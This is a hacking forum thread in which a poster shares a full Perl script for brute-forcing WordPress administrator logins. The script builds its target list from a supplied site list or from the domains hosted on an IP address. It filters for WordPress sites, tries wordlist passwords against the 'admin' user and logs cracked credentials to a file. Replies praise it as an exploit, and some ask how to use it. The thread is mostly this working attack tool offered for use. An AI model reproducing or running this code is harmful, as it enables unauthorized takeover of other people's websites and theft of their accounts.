Wordpress brute force By IP or list (1 Viewer)

[Golden-Hacker]

Wordpress brute force By IP or list

Wordpress brute force By Ip Or List
options :
1- Faster
2- brute Only Wordpress And Scan Wordpress Site
3- brute By ip

​

#!/usr/bin/perl



use LWP::UserAgent;
use HTTP::Request;
use LWP::Simple;
use LWP::UserAgent;
use Win32::Console::ANSI;
use IO::Select;
use HTTP::Response;
use HTTP::Request::Common qw(POST);
use HTTP::Request::Common qw(GET);
use URI::URL;
use IO::Socket::INET;
use Term::ANSIColor;

if ($^O =~ /MSWin32/) {system("cls"); system("color A");
}else { system("clear"); }
print "    ######################################################################\n";
print "    #                                                                    #\n";
print color 'reset';
print color("bold red"),"    #                           Golden-Hacker                            #\n";
print color("bold red"),"    #                      _____            _    _                       #\n";
print color("bold red"), "    #                     / ____|          | |  | |                      #\n";
print color("bold red"), "    #                    | |  __   ______  | |__| |                      #\n";
print color("bold red"), "    #                    | | |_ | |______| |  __  |                      #\n";
print color("bold red"), "    #                    | |__| |          | |  | |                      # \n";
print color("bold red"), "    #                      \_____|          |_|  |_|                      # \n";
print color 'reset';
print color("bold Green"), "    #                                                                    #  \n";
print color("bold Green"), "    # Skype : Mrmohmed.Hacker                                            #  \n";
print color("bold Green"), "    #                                                                    #  \n";
print color("bold Green"), "    ######################################################################\n";
print color("bold Green"), "\n";
print color("bold Green"), "[*]-----------------------------------------------------------------------[*]\n";
print color("bold Green"), "[+] Script Name          :{*} Wordpress brute force perl {*} \n";
print color("bold Green"), "[+] Version              : 2.0\n";
print color("bold Green"), "[+] Programed By         : Golden-Hacker & Ahmed Ali\n";
print color("bold Green"), "[+] Email                : [email protected] & http://Fb.com/mrm0hm3d\n";
print color("bold Green"), "[+] Thank  For           : Jok3r & KaSper_BaGhDaD & Aymen & All Fr. \n";
print color("bold Green"), "[*]-----------------------------------------------------------------------[*]\n";
print color("bold Green"), "\n";
print color 'reset';

print color("bold red"),"[1] Brute By Ip \n";
print color("bold white"), "\n";
print color 'reset';
print color("bold Black"),"[2] Brute By List \n";
print color("bold white"), "\n";
print color 'reset';
print color("bold Green"),"Choose --> ";
$name=<STDIN>;
chomp $name;






if ($name=~"2")
{


print color("bold red"), " List Sites --> ";
$opn=<STDIN>;
chomp $opn;
print color 'reset';
print color("bold yellow"), " List Pass  --> ";
$passs=<STDIN>;
chomp $passs;
$user = "admin";
print color("bold Green"), "\n";
print color("bold red"), "[*] Wait To Find Only WordPress ....\n";

open(tarrget,"$opn") or die "Please Put List :) \n";
while(<tarrget>){
chomp($_);
$site = $_;
if($site !~ /http:\/\//) { $site = "http://$site/"; };
if ($site !~ /^http:\/\//){
$site = 'http://' . $site;
}
if ($site !~ /\/wp-login.php/){
$site = $site . '/wp-login.php';
efrez();

}

sub efrez($site){
$ua = LWP::UserAgent->new(keep_alive => 1);
$ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
$ua->timeout (10);

my $efreez = $ua->get("$site")->content;
if($efreez =~/wp-content\/themes\/|wp-content\/plugins\/|wordpress/) {
print color("bold Green"), "\n";
    print colored("[WordPress] $site",'white on_blue'),"\n\n\n";
open(save, '>>Wordpress.txt');
    print save "$site\n";
    close(save);
attack();
}
}


$sitess = $site . '/wp-admin/';
$sitesss = $site . 'wp-admin/';

sub attack(){
open(a,"<$passs") or die "$!";
print "\n\nSite: $site\n\n";
sleep(2);
while(<a>){
chomp($_);
my $ua = new LWP::UserAgent;
my $response = $ua->post($site, { log => $user, pwd => $_,wp-submit => 'Log in',});


my $code = $response->as_string;



print color 'reset';
print color("bold red"), "[*] $site $user $_\n";
if($code =~ /Location:/){
if($code =~ /wordpress_logged_in/){
print color 'reset';
print color("bold Green"),"========================================================\n\n\[Success Found] $site\n[User]=$user\n[Pass]=$_\n\n========================================================
";
open (TEXT, '>>Cracked.txt');
print TEXT "[Success]$site=[User]=$user=[Pass]=$_ ==> :)\n";
close (TEXT);
}
}
}
}
}
}
if ($name=~"1")
{
print color 'reset';
print color("bold yellow"), " List Pass  --> ";
$passs=<STDIN>;
chomp $passs;

if($^O =~ /Win/){
   system("cls");
   system("color a");
   system("title Get Sites by : ip");
}else{
   system("clear");
}
print color 'reset';
print color("bold Red"), "\nPut IP Address : ";
my $host = <>;
chomp($host);
my $ua = LWP::UserAgent->new(agent => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1) Gecko/20090624 Firefox/3.5');
my $zz = $ua->post('http://domains.yougetsignal.com/domains.php',
{
        remoteAddress => $host,
}
);
my $resulta = $zz->content;
while ($resulta =~ m/\[([^\]]*)\]/g)
{
        $zeb = $1;
        $zeb =~ m/\"(.*?)\", \"?\"/g;
open(a, ">>$host.txt");
print a "http://$1/\n";
close(a);
}
print "\nresult in $host.txt";

$opn="$host.txt";
chomp $opn;

$user = "admin";
print color("bold Green"), "\n";
print color("bold red"), "[*] Wait To Find Only WordPress ....\n";

open(tarrget,"$opn") or die "Please Put List :) \n";
while(<tarrget>){
chomp($_);
$site = $_;
if($site !~ /http:\/\//) { $site = "http://$site/"; };
if ($site !~ /^http:\/\//){
$site = 'http://' . $site;
}
if ($site !~ /\/wp-login.php/){
$site = $site . '/wp-login.php';

ipe();
}

sub ipe($site){
$ua = LWP::UserAgent->new(keep_alive => 1);
$ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
$ua->timeout (10);

my $ipe = $ua->get("$site")->content;
if($ipe =~/wp-content\/themes\/|wp-content\/plugins\/|wordpress/) {
print color("bold Green"), "\n";
    print colored("[WordPress] $site",'white on_blue'),"\n\n\n";
open(save, '>>Wordpress.txt');
    print save "$site\n";
    close(save);
attack1();
}
}





sub attack1(){

$sites = $site . '/wp-admin/';
$sitess = $site . 'wp-admin/';

open(a,"<$passs") or die "$!";
print "\n\nSite: $site\n\n";
sleep(2);
while(<a>){
chomp($_);
my $ua = new LWP::UserAgent;
my $response = $ua->post($site, { log => $user, pwd => $_,wp-submit => 'Log in',});


my $code = $response->as_string;



print color 'reset';
print color("bold red"), "[*] $site $user $_\n";
if($code =~ /Location:/){
if($code =~ /wordpress_logged_in/){
print color 'reset';
print color("bold Green"),"========================================================\n\n\[Success Found] $site\n[User]=$user\n[Pass]=$_\n\n========================================================
";
open (TEXT, '>>Cracked.txt');
print TEXT "[Success]$site=[User]=$user=[Pass]=$_ ==> :)\n";
close (TEXT);
}
}
}
}
}
}

exit

Thank All


​

 

[TheWayEnd]

Thank You Bro For Good Shared Perfect Exploit and welcome here

 

[El-Cewad]

Thanks bro , welcome

 

[st0rm]

Thank you man . Now you are our brother

 

[h4cky0u]

Thnx for share and welcome.

 

[Golden-Hacker]

thank all and i will make a Good Job

 

[qraLbosp]

thanks bro

 

[by_dadaş]

nasıl kullanıcaz peki bunu

 

[Dragon Caliph]

Thanks Dude, Welcome to Spy family

 

[adanapergole]

kullanmayı öğretecek arkadaşlar yokmu.

 

[karaman]

aynen bide tam olarak ne işe yaradığını anlatsaydın